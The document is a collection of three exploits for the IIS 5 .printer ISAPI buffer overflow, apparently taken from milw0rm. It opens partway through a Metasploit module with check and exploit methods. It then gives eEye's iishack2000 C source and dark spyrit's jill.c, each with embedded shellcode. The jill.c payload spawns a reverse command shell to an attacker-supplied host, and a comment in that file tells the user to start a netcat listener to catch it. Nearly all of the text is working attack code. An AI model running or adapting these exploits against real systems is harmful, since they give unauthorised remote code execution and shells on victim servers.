Exploit::CheckCode::Safe end connect sock.put("GET /NULL.printer HTTP/1.0\r\nHost: #{"X"*257}\r\n\r\n") resp = sock.get_once disconnect if (resp and resp =~ /locked out/) print_status("The IUSER account is locked out, we can't check") return Exploit::CheckCode::Detected end if (resp and resp.index("HTTP/1.1 500") >= 0) return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def exploit connect buf = make_nops(280) buf[268, 4] = [target.ret].pack('V') # payload is at: [ebx + 96] + 256 + 64 buf << "\x8b\x4b\x60" # mov ecx, [ebx + 96] buf << "\x80\xc1\x40" # add cl, 64 buf << "\x80\xc5\x01" # add ch, 1 buf << "\xff\xe1" # jmp ecx sock.put("GET http://#{buf}/NULL.printer?#{payload.encoded} HTTP/1.0\r\n\r\n") handler disconnect end end

/*********************************************************************** iishack 2000 - eEye Digital Security - 2001 This affects all unpatched windows 2000 machines with the .printer isapi filter loaded. This is purely proof of concept. Quick rundown of the exploit: Eip overruns at position 260 i have 19 bytes of code to jump back to the beginning of the buffer. (and a 4 byte eip jumping into a jmp esp located in mfc42.dll). The jumpback was kinda weird, requiring a little forward padding to protect the rest of the code. The buffer itself: Uou only have about 250ish bytes before the overflow(taking into account the eip and jumpback), and like 211 after it. this makes things tight. This is why i hardcoded the offsets and had 2 shellcodes, one for each revision. normally, this would suck, but since iis is kind to us, it cleanly restarts itself if we blow it, giving us another chance. This should compile clean on windows, linux and *bsd. Other than that, you are on your own, but the vector is a simple tcp vector, so no biggie. The vector: the overflow happens in the isapi handling the .printer extension. The actual overflow is in the Host: header. This buffer is a bit weird, soi be carfull what you pass into it. It has a minimal amount of parsing happening before we get it, making some chars not able to be used(or forcing you to encode your payload). As far as i can tell, the bad bytes i've come across are: 0x00(duh) 0x0a(this inits a return, basically flaking our buffer) 0x0d(same as above) 0x3a(colon: - this seems to be a separator of some kind, didn't have time or energy to reverse it any further, it breaks stuff, keep it out of your buffer) i have a feeling that there are more bad chars, but in the shellcode i've written (both this proof of concept and actual port binding shellcode), i've come across problems, but haven't specifically tagged a "bad" char. One more thing... inititally, i got this shellcode to fit on the left side of the buffer overflow. something strange was causing it to fail if i had a length of under about 315 chars. This seems strange to me, but it could be soemthing i just screwed up writing this code. This explains the 0x03s padding the end of the shellcode. Ryan Permeh ryan@eeye.com greetz: riley, for finding the hole marc, for being a cool boss dale,nicula,firas, for being pimps greg hoglund, for sparking some really interesting ideas on exploitable buffers dark spyrit, for beginning the iis hack tradition I would also like to thank the academy and to all of those who voted.... Barry, Levonne, and their $240.00 worth of pudding. http://www.eeye.com/html/research/Advisories/tequila.jpg *************************************************************************/ #ifdef _WIN32 #include <Winsock2.h> #include <Windows.h> #define snprintf _snprintf #else #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> #endif #include <stdio.h> void usage(); unsigned char GetXORValue(char *szBuff, unsigned long filesize); unsigned char sc[2][315]={ "\x8b\xc4\x83\xc0\x11\x33\xc9\x66\xb9\x20\x01\x80\x30\x03\x40\xe2\xfa\xeb" "\x03\x03\x03\x03\x5c\x88\xe8\x82\xef\x8f\x09\x03\x03\x44\x80\x3c\xfc\x76" "\xf9\x80\xc4\x07\x88\xf6\x30\xca\x83\xc2\x07\x88\x04\x8a\x05\x80\xc5\x07" "\x80\xc4\x07\xe1\xf7\x30\xc3\x8a\x3d\x80\xc5\x07\x80\xc4\x17\x8a\x3d\x80" "\xc5\x07\x30\xc3\x82\xc4\xfc\x03\x03\x03\x53\x6b\x83\x03\x03\x03\x69\x01" "\x53\x53\x6b\x03\x03\x03\x43\xfc\x76\x13\xfc\x56\x07\x88\xdb\x30\xc3\x53" "\x54\x69\x48\xfc\x76\x17\x50\xfc\x56\x0f\x50\xfc\x56\x03\x53\xfc\x56\x0b" "\xfc\xfc\xfc\xfc\xcb\xa5\xeb\x74\x8e\x28\xea\x74\xb8\xb3\xeb\x74\x27\x49" "\xea\x74\x60\x39\x5f\x74\x74\x74\x2d\x66\x46\x7a\x66\x2d\x60\x6c\x6e\x2d" "\x77\x7b\x77\x03\x6a\x6a\x70\x6b\x62\x60\x68\x31\x68\x23\x2e\x23\x66\x46" "\x7a\x66\x23\x47\x6a\x64\x77\x6a\x62\x6f\x23\x50\x66\x60\x76\x71\x6a\x77" "\x7a\x0e\x09\x23\x45\x6c\x71\x23\x67\x66\x77\x62\x6a\x6f\x70\x23\x75\x6a" "\x70\x6a\x77\x39\x23\x4b\x77\x77\x73\x39\x2c\x2c\x74\x74\x74\x2d\x66\x46" "\x7a\x66\x2d\x60\x6c\x6e\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03" "\x03\x03\x03\x03\x03\x03\x03\x03\x90\x90\x90\x90\x90\x90\x90\x90\xcb\x4a" "\x42\x6c\x90\x90\x90\x90\x66\x81\xec\x14\x01\xff\xe4\x03\x03\x03\x03\x03" "\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x00" "\x8b\xc4\x83\xc0\x11\x33\xc9\x66\xb9\x20\x01\x80\x30\x03\x40\xe2\xfa\xeb" "\x03\x03\x03\x03\x5c\x88\xe8\x82\xef\x8f\x09\x03\x03\x44\x80\x3c\xfc\x76" "\xf9\x80\xc4\x07\x88\xf6\x30\xca\x83\xc2\x07\x88\x04\x8a\x05\x80\xc5\x07" "\x80\xc4\x07\xe1\xf7\x30\xc3\x8a\x3d\x80\xc5\x07\x80\xc4\x17\x8a\x3d\x80" "\xc5\x07\x30\xc3\x82\xc4\xfc\x03\x03\x03\x53\x6b\x83\x03\x03\x03\x69\x01" "\x53\x53\x6b\x03\x03\x03\x43\xfc\x76\x13\xfc\x56\x07\x88\xdb\x30\xc3\x53" "\x54\x69\x48\xfc\x76\x17\x50\xfc\x56\x0f\x50\xfc\x56\x03\x53\xfc\x56\x0b" "\xfc\xfc\xfc\xfc\x50\x33\xeb\x74\xf7\x86\xeb\x74\x2e\xf0\xeb\x74\x4c\x30" "\xeb\x74\x60\x39\x5f\x74\x74\x74\x2d\x66\x46\x7a\x66\x2d\x60\x6c\x6e\x2d" "\x77\x7b\x77\x03\x6a\x6a\x70\x6b\x62\x60\x68\x31\x68\x23\x2e\x23\x66\x46" "\x7a\x66\x23\x47\x6a\x64\x77\x6a\x62\x6f\x23\x50\x66\x60\x76\x71\x6a\x77" "\x7a\x0e\x09\x23\x45\x6c\x71\x23\x67\x66\x77\x62\x6a\x6f\x70\x23\x75\x6a" "\x70\x6a\x77\x39\x23\x4b\x77\x77\x73\x39\x2c\x2c\x74\x74\x74\x2d\x66\x46" "\x7a\x66\x2d\x60\x6c\x6e\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03" "\x03\x03\x03\x03\x03\x03\x03\x03\x90\x90\x90\x90\x90\x90\x90\x90\xcb\x4a" "\x42\x6c\x90\x90\x90\x90\x66\x81\xec\x14\x01\xff\xe4\x03\x03\x03\x03\x03" "\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x00" }; main (int argc, char *argv[]) { char request_message[500]; int X,sock,sp=0; unsigned short serverport=htons(80); struct hostent *nametocheck; struct sockaddr_in serv_addr; struct in_addr attack; #ifdef _WIN32 WORD werd; WSADATA wsd; werd= MAKEWORD(2,0); WSAStartup(werd,&wsd); #endif printf("iishack2000 - Remote .printer overflow in 2k sp0 and sp1\n"); printf("Vulnerability found by Riley Hassell <riley@eeye.com>\n"); printf("Exploit by Ryan Permeh <ryan@eeye.com>\n"); if(argc < 4) usage(); if(argv[1] != NULL) { nametocheck = gethostbyname (argv[1]); memcpy(&attack.s_addr,nametocheck->h_addr_list[0],4); } else usage(); if(argv[2] != NULL) { serverport=ntohs((unsigned short)atoi(argv[2])); } if(argv[3] != NULL) { sp=atoi(argv[3]); } printf("Sending string to overflow sp %d for host: %s on port:%d\n",sp,inet_ntoa(attack),htons(serverport)); memset(request_message,0x00,500); snprintf(request_message,500,"GET /null.printer HTTP/1.1\r\nHost: %s\r\n\r\n",sc[sp]); sock = socket (AF_INET, SOCK_STREAM, 0); memset (&serv_addr, 0, sizeof (serv_addr)); serv_addr.sin_family=AF_INET; serv_addr.sin_addr.s_addr = attack.s_addr; serv_addr.sin_port = serverport; X=connect (sock, (struct sockaddr *) &serv_addr, sizeof (serv_addr)); if(X==0) { send(sock,request_message,strlen(request_message)*sizeof(char),0); printf("Sent overflow, now look on the c: drive of %s for www.eEye.com.txt\n",inet_ntoa(attack)); printf("If the file doesn't exist, the server may be patched,\nor may be a different service pack (try again with %d as the service pack)\n",sp==0?1:0); } else { printf("Couldn't connect\n",inet_ntoa(attack)); } #ifdef _WIN32 closesocket(sock); #else close(sock); #endif return 0; } void usage() { printf("Syntax: iishack2000 <hostname> <server port> <service pack>\n"); printf("Example: iishack2000 127.0.0.1 80 0\n"); printf("Example: iishack2000 127.0.0.1 80 1\n"); exit(1); } // milw0rm.com [2001-05-07]

/* IIS 5 remote .printer overflow. "jill.c" (don't ask). * * by: dark spyrit <dspyrit@beavuh.org> * * respect to eeye for finding this one - nice work. * shouts to halvar, neofight and the beavuh bitchez. * * this exploit overwrites an exception frame to control eip and get to * our code.. the code then locates the pointer to our larger buffer and * execs. * * usage: jill <victim host> <victim port> <attacker host> <attacker port> * * the shellcode spawns a reverse cmd shell.. so you need to set up a * netcat listener on the host you control. * * Ex: nc -l -p <attacker port> -vv * * I haven't slept in years. */ #include <sys/types.h> #include <sys/time.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <unistd.h> #include <errno.h> #include <stdlib.h> #include <stdio.h> #include <string.h> #include <fcntl.h> #include <netdb.h> int main(int argc, char *argv[]){ /* the whole request rolled into one, pretty huh? carez. */ unsigned char sploit[]= "\x47\x45\x54\x20\x2f\x4e\x55\x4c\x4c\x2e\x70\x72\x69\x6e\x74\x65\x72\x20" "\x48\x54\x54\x50\x2f\x31\x2e\x30\x0d\x0a\x42\x65\x61\x76\x75\x68\x3a\x20" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90\x90\x90" "\x8b\xc5\x33\xc9\x66\xb9\xd7\x02\x50\x80\x30\x95\x40\xe2\xfa\x2d\x95\x95" "\x64\xe2\x14\xad\xd8\xcf\x05\x95\xe1\x96\xdd\x7e\x60\x7d\x95\x95\x95\x95" "\xc8\x1e\x40\x14\x7f\x9a\x6b\x6a\x6a\x1e\x4d\x1e\xe6\xa9\x96\x66\x1e\xe3" "\xed\x96\x66\x1e\xeb\xb5\x96\x6e\x1e\xdb\x81\xa6\x78\xc3\xc2\xc4\x1e\xaa" "\x96\x6e\x1e\x67\x2c\x9b\x95\x95\x95\x66\x33\xe1\x9d\xcc\xca\x16\x52\x91" "\xd0\x77\x72\xcc\xca\xcb\x1e\x58\x1e\xd3\xb1\x96\x56\x44\x74\x96\x54\xa6" "\x5c\xf3\x1e\x9d\x1e\xd3\x89\x96\x56\x54\x74\x97\x96\x54\x1e\x95\x96\x56" "\x1e\x67\x1e\x6b\x1e\x45\x2c\x9e\x95\x95\x95\x7d\xe1\x94\x95\x95\xa6\x55" "\x39\x10\x55\xe0\x6c\xc7\xc3\x6a\xc2\x41\xcf\x1e\x4d\x2c\x93\x95\x95\x95" "\x7d\xce\x94\x95\x95\x52\xd2\xf1\x99\x95\x95\x95\x52\xd2\xfd\x95\x95\x95" "\x95\x52\xd2\xf9\x94\x95\x95\x95\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x85\xc5" "\x18\xd2\x81\xc5\x6a\xc2\x55\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x8d\xc5\x18" "\xd2\x89\xc5\x6a\xc2\x55\x52\xd2\xb5\xd1\x95\x95\x95\x18\xd2\xb5\xc5\x6a" "\xc2\x51\x1e\xd2\x85\x1c\xd2\xc9\x1c\xd2\xf5\x1e\xd2\x89\x1c\xd2\xcd\x14" "\xda\xd9\x94\x94\x95\x95\xf3\x52\xd2\xc5\x95\x95\x18\xd2\xe5\xc5\x18\xd2" "\xb5\xc5\xa6\x55\xc5\xc5\xc5\xff\x94\xc5\xc5\x7d\x95\x95\x95\x95\xc8\x14" "\x78\xd5\x6b\x6a\x6a\xc0\xc5\x6a\xc2\x5d\x6a\xe2\x85\x6a\xc2\x71\x6a\xe2" "\x89\x6a\xc2\x71\xfd\x95\x91\x95\x95\xff\xd5\x6a\xc2\x45\x1e\x7d\xc5\xfd" "\x94\x94\x95\x95\x6a\xc2\x7d\x10\x55\x9a\x10\x3f\x95\x95\x95\xa6\x55\xc5" "\xd5\xc5\xd5\xc5\x6a\xc2\x79\x16\x6d\x6a\x9a\x11\x02\x95\x95\x95\x1e\x4d" "\xf3\x52\x92\x97\x95\xf3\x52\xd2\x97\x8e\xac\x52\xd2\x91\x5e\x38\x4c\xb3" "\xff\x85\x18\x92\xc5\xc6\x6a\xc2\x61\xff\xa7\x6a\xc2\x49\xa6\x5c\xc4\xc3" "\xc4\xc4\xc4\x6a\xe2\x81\x6a\xc2\x59\x10\x55\xe1\xf5\x05\x05\x05\x05\x15" "\xab\x95\xe1\xba\x05\x05\x05\x05\xff\x95\xc3\xfd\x95\x91\x95\x95\xc0\x6a" "\xe2\x81\x6a\xc2\x4d\x10\x55\xe1\xd5\x05\x05\x05\x05\xff\x95\x6a\xa3\xc0" "\xc6\x6a\xc2\x6d\x16\x6d\x6a\xe1\xbb\x05\x05\x05\x05\x7e\x27\xff\x95\xfd" "\x95\x91\x95\x95\xc0\xc6\x6a\xc2\x69\x10\x55\xe9\x8d\x05\x05\x05\x05\xe1" "\x09\xff\x95\xc3\xc5\xc0\x6a\xe2\x8d\x6a\xc2\x41\xff\xa7\x6a\xc2\x49\x7e" "\x1f\xc6\x6a\xc2\x65\xff\x95\x6a\xc2\x75\xa6\x55\x39\x10\x55\xe0\x6c\xc4" "\xc7\xc3\xc6\x6a\x47\xcf\xcc\x3e\x77\x7b\x56\xd2\xf0\xe1\xc5\xe7\xfa\xf6" "\xd4\xf1\xf1\xe7\xf0\xe6\xe6\x95\xd9\xfa\xf4\xf1\xd9\xfc\xf7\xe7\xf4\xe7" "\xec\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xfc\xe5\xf0\x95\xd2\xf0\xe1\xc6" "\xe1\xf4\xe7\xe1\xe0\xe5\xdc\xfb\xf3\xfa\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0" "\xc5\xe7\xfa\xf6\xf0\xe6\xe6\xd4\x95\xc5\xf0\xf0\xfe\xdb\xf4\xf8\xf0\xf1" "\xc5\xfc\xe5\xf0\x95\xd2\xf9\xfa\xf7\xf4\xf9\xd4\xf9\xf9\xfa\xf6\x95\xc2" "\xe7\xfc\xe1\xf0\xd3\xfc\xf9\xf0\x95\xc7\xf0\xf4\xf1\xd3\xfc\xf9\xf0\x95" "\xc6\xf9\xf0\xf0\xe5\x95\xd0\xed\xfc\xe1\xc5\xe7\xfa\xf6\xf0\xe6\xe6\x95" "\xd6\xf9\xfa\xe6\xf0\xdd\xf4\xfb\xf1\xf9\xf0\x95\xc2\xc6\xda\xd6\xde\xa6" "\xa7\x95\xc2\xc6\xd4\xc6\xe1\xf4\xe7\xe1\xe0\xe5\x95\xe6\xfa\xf6\xfe\xf0" "\xe1\x95\xf6\xf9\xfa\xe6\xf0\xe6\xfa\xf6\xfe\xf0\xe1\x95\xf6\xfa\xfb\xfb" "\xf0\xf6\xe1\x95\xe6\xf0\xfb\xf1\x95\xe7\xf0\xf6\xe3\x95\xf6\xf8\xf1\xbb" "\xf0\xed\xf0\x95\x0d\x0a\x48\x6f\x73\x74\x3a\x20\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x33" "\xc0\xb0\x90\x03\xd8\x8b\x03\x8b\x40\x60\x33\xdb\xb3\x24\x03\xc3\xff\xe0" "\xeb\xb9\x90\x90\x05\x31\x8c\x6a\x0d\x0a\x0d\x0a"; int s; unsigned short int a_port; unsigned long a_host; struct hostent *ht; struct sockaddr_in sin; printf("iis5 remote .printer overflow.\n" "dark spyrit <dspyrit@beavuh.org> / beavuh labs.\n"); if (argc != 5){ printf("usage: %s <victimHost> <victimPort> <attackerHost> <attackerPort>\n",argv[0]); exit(1); } if ((ht = gethostbyname(argv[1])) == 0){ herror(argv[1]); exit(1); } sin.sin_port = htons(atoi(argv[2])); a_port = htons(atoi(argv[4])); a_port^=0x9595; sin.sin_family = AF_INET; sin.sin_addr = *((struct in_addr *)ht->h_addr); if ((ht = gethostbyname(argv[3])) == 0){ herror(argv[3]); exit(1); } a_host = *((unsigned long *)ht->h_addr); a_host^=0x95959595; sploit[441]= (a_port) & 0xff; sploit[442]= (a_port >> 8) & 0xff; sploit[446]= (a_host) & 0xff; sploit[447]= (a_host >> 8) & 0xff; sploit[448]= (a_host >> 16) & 0xff; sploit[449]= (a_host >> 24) & 0xff; if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){ perror("socket"); exit(1); } printf("\nconnecting... \n"); if ((connect(s, (struct sockaddr *) &sin, sizeof(sin))) == -1){ perror("connect"); exit(1); } write(s, sploit, strlen(sploit)); sleep (1); close (s); printf("sent... \nyou may need to send a carriage on your listener if the shell doesn't appear.\nhave fun!\n"); exit(0); } // milw0rm.com [2001-05-08]